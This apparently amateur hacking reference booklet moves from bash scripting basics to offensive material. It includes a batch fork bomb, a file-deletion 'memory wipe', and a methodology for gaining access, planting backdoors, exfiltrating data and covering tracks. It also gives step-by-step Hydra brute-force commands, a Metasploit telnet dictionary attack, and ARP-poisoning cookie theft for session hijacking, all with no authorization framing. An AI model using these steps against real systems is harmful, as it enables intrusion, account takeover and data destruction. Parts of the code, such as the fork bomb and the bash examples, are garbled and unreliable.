Hacking Reference

Booklet

LEZZOR CORP | @omegablade

Contents
Command Shell Scripting.......................................................................................................................3
Shell Types.........................................................................................................................................3
Identifying Shell.................................................................................................................................3
Hello World........................................................................................................................................3
Variables............................................................................................................................................4
Arguments.........................................................................................................................................4
If statements......................................................................................................................................4
Command Shell Scripting
Shell Types
Csh: C shell, has a similar scripting style as C

Ksh: Korn Shell, can do some nice programming features like floating point math

Bash: Boune again shell, a text based shell like the unix system

Zsh: Z shell, It is considered to be the most feature rich shell with enhanced command completion
and the ability to implement modules which are used to add features like networking &
programming

Identifying Shell
Type in:
ps -p $$
And the output will be:
PID TTY TIME CMD
7410 pts/1 00:00:00 bash
PID: The ID of all the processes

TIME: The time operating

CMD: The current shell

Hello World
Open up a new file in kate (textedit for Ubuntu) and write the following:
#!/bin/bash
echo “helloworld”
To save the file go:

File > Save

Then choose where you want to save it. For the purposes of this tutorial, save it as “helloworld”
Before using it we need to change it into an executable, to do this type into bash:
chmod u+x helloworld
while you are in the directory with the file. To run the program type ./helloworld into bash. The
./ command tells the computer that the file will be run from the current directory, not from
anywhere else.

#! Is known as the shebang and indicates the interpreter for the script

/bin/bash is the location of the interpreter

Variables
There are 2 types of variables in bash:

Local variables: Only exists in the current shell and will go away once we exit the shell

Global variables: Exists in all scripts we run, forever

Functions: Takes code which may be repeated, and allows us to call them as often as we like

Arguments
They allow users to input values into their scripts. For instance, when the script:
#!/bin/bash
MESSAGE= “Wake up, ” $1
echo $MESSAGE
and is saved as the program called wake. When it is executed with the command
./wake friend
The output would be:
Wake up, friend
The $ is where the script accepts arguments and you can add arguments after implementing the
initial command.

Argument Behaviour
$0 Name of script
$1 1st argument
$2 2nd argument
$9 9th argument
$# N.o. arguments we have

If statements
Conditional statements changes how a script acts depending on the input. For example:
If [“$1” = “Neo…”]; then
MESSAGE = “Wake up” $1
else
MESSAGE= “Hey, you’re not Neo”
fi
echo $MESSAGE

Wget
Wget may not already be installed on Kali linux, thus, to download this command type:
sudo apt-get install wget

Wget downloads the targeted file from the internet. The syntax is:
wget [options] [URL]
Computer Destruction
Fork Bombs
A fork bomb is a program which fills up the RAM which causes the system to crash. For a simple fork
bomb the code is:
%01%0
This is short for:
:s
start %0
goto s

The first line sets a check point at the beginning of program. Then the %0 retrieves the name of
the .bat file and then the goto s send the program back to the checkpoint.

However, you can add @echo off to hide the cmd window from the user.

Memory wipe
This program will keep on deleting files until it deletes a vital file which causes the system to crash.
del *.*
The * before the ‘.’ Means that the program will delete the file no matter the name. The * after the ‘.’
will tell the program to delete the file no matter the type.

Concepts
Rudy (R U Dead Yet?)
This attack tool generates a slow rate and volume of traffic to avoid anti-DoS tools. This is done by
making the server open to a post request and rather than sending a sing packet, it will send a series
of bytes to the web server. After a few thousand requests, it will stop the web server from working
altogether.

GNOME
GNU Object Model Environment

It is comprised of mostly open source and free tools. It also uses fewer resources than KDE (K
Desktop Environment) however KDE has better customization.

Rootkits
It is a set of programs which can give a user admin privileges

Bootkit: It is a rootkit which uses the start-up code to initiate its attack

Payload: The section of a computer virus which executes malicious activity. For instance, data
destruction, offensive messages, etc.
IRC (Internet relay chat)
It is a pure text chat service. One of the more important ones is the Computer Hope Chat Room
where users asks questions live.

Sample commands:

Commands Use
\away Informs everyone you are AFK
\dcc chat [username]
\ignore [on/off]
\nick [username] Changes username
\help
Hacking Methodology
This is a simple guide for hacking.

Reconnaissance
Do this before the hack and find out about:

 Computers
 Servers
 Printers
 OS
 Wireless networks
 IT admins
 Etc.

Passive: Information gather without touching the target (Basically do not send any packets to the
target)

Active:

 Gather info about a system actively

 Nmap
 Hping
 Uniscan

Gain Access
After recon, you can figure out the vulnerabilities on the network. You can use:

 Services with known exploits

 Known vulnerabilities on web servers

The goal is to get shell access onto a system so you can execute commands

Escalate privileges
Get to root level on the system. Things you can use are:

 Metasploit
 Exploits
 Social engineering

Leave a backdoor
In case you need to access the system again you ned to leave a way in without having to constantly
exploit the system. Sample tools which you can use are:

 Netcat
 Meterpreter (metasploit)
 VNC

Data extraction
Acquire desired data. Note admins can see what files you have accessed, so you could try using a tool
like cryptocat.

Covering your tracks

After you are done, you need to hide what you just did. So you can use tools like:
 Clearing your log files
 Remove hacking files on the system
 Remove command exe history in bash
 Use metasploit commands:
o KillAV
o clearEV
Assembly Cracking with Microcorruption
Microcorruption is a nice website which is designed to teach users how to diassemble different
programs for the purposes of cracking. It is a good introduction for anyone who wants to learn about
analysing malware or cracking software.
Tools explanations
Zenmap
It is the GUI version of nmap
Tip: When using, this program remember to minimize the terminal
Fields
Target: Enter ip here, (use * for scanning all possible values)
Hosts: Shows the host ip addresses and OS
Services: Shows all the services scanned
Ports/hosts: Shows
 Ports
 Protocols
 State
 Service
 Version

Host details: Select host and then you can obtain details about the host
Scans: A log of all the previous scans you have run
Command: How this command would look like in Nmap
Topology: A map of the scanned network with all the hosts connected to said network
Sample use
Step 1
Type in target field:
192.168.1.*
(Sample ip) to scan the network and use the regular scan type command to save time.

Step 2
You also need to check the gateway to ensure you do not mix it up with a host by typing
route -n
in bash

Step 3
Do the same as step one but with intense scan on your target OS
Hydra
Fun idea: Maybe try brute forcing ftp or ssh services instead of the old-fashioned http services.
GUI version: hydra-gtk
Sample command
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra: You need to state the program needed to be used (general bash)

-l means login, if it is a lowercase L, then it will take the next argument (user) as the username.
However, if -L were in uppercase, it will expect a file path to a wordlist (then performs a dictionary
attack to find the username) to find the username

-P Same as -l but for passwords

ftp:// it is the service which is being targeted

Guides
Dictionary hacking with Telnet
Step 1
To scan for ip address range and list hosts type:
Nmap -sn 192.168.227*
Remember that the 192.168.227 section is simply supposed to be an example.

Step 2
Scan target with:
nmap 192.168.227.130
Only if the above ip address your target. Also the telnet port needs to be open

Step 3
Open the metasploit console using:
msfconsole
Step 4
Then look for telnet exploits using:
search telnet
Step 5
Then type:
use auxiliary/scanner/telnet/telnet_login
Step 6
Then look at options
show options
Step 7
Then apply the following settings
set USER_AS_PASS true
set BLANK-PASSWORDS true
set rhosts 192.168.227.130
set USERPASS_FILE /root/desktop/test.txt
Note that you will need a dictionary file in USERPASS_FILE for this exploit to work

Step 8
Install putty using:
apt-get install putty
Then user putty to connect
Cookie stealing
Step 1
Open terminal then open Ettercap using:
ettercap -G
Step 2
Go to
sniff> unified sniffing
And then go and select primary network interface for your computer(eth0 or WLAN)
Step 3
Go to
hosts> Host lists
Then go to
Hosts>Scan for hosts

After that select targets 1 & 2

Step 4
Go to
Mitm>Arp Poisoning
Then sniff remote connections

Step 5
Go to
start>start sniffing
Step 6
Open wireshark.
Then select network interface and then start a wireshark scan
Step 7
Set your wireshark filter as
http.cookie
because we are looking for cookies. Then we should wait for a bit for the target to generate the
cookie.

Step 8
When the cookie is generated, right-click, select:
cookie packet>copy>Bytes> Printable text only
This just copies the cookie onto our clipboard.

Step 9
Go to the target website then set the cookie to:

Name: [This really doesn’t matter]

Host: [Hostname].com
Content: [Ctrl + V]

Now we are logged in as the user